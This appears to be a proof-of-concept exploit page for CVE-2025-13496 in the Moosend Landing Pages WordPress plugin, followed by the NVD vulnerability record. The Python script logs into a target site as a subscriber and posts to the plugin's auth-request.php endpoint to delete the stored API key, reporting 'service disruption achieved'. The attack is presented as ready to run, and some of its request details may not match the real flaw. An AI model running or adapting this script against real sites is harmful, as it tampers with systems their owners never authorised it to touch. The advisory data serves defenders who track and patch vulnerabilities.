CVE-2025-13496

import requests # CVE-2025-13496 PoC - Moosend Landing Pages Auth Bypass # Target: WordPress site with Moosend Landing Pages plugin <= 1.1.6 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" PASSWORD = "subscriber_password" def exploit_cve_2025_13496(): """ This PoC demonstrates the unauthorized deletion of moosend_landing_api_key option. The vulnerability exists due to missing capability check in moosend_landings_auth_get function. """ session = requests.Session() # Step 1: Login as subscriber-level user login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/" } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return False print("[+] Login successful as subscriber") # Step 2: Send request to vulnerable endpoint to delete API key # The vulnerable function: moosend_landings_auth_get # Located at: /forms/auth-request.php vuln_url = f"{TARGET_URL}/wp-content/plugins/moosend-landing-pages/forms/auth-request.php" # Send DELETE request to remove moosend_landing_api_key option delete_data = { 'action': 'moosend_landings_auth_get', 'option_name': 'moosend_landing_api_key' } response = session.post(vuln_url, data=delete_data) if response.status_code == 200: print("[+] Successfully deleted moosend_landing_api_key option") print("[+] Plugin API key has been removed - service disruption achieved") return True else: print(f"[-] Request failed with status: {response.status_code}") return False if __name__ == "__main__": exploit_cve_2025_13496()

{"cve": {"id": "CVE-2025-13496", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:48.183", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Moosend Landing Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the moosend_landings_auth_get function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the 'moosend_landing_api_key' option value."}, {"lang": "es", "value": "El plugin Moosend Landing Pages para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de verificación de capacidad en la función moosend_landings_auth_get en todas las versiones hasta la 1.1.6, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, eliminen el valor de la opción 'moosend_landing_api_key'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/moosend-landing-pages/tags/1.1.6/forms/auth-request.php#L7", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/moosend-landing-pages/trunk/forms/auth-request.php#L7", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eeb4b3b1-47ae-4314-a386-832949456f81?source=cve", "source": "[email protected]"}]}}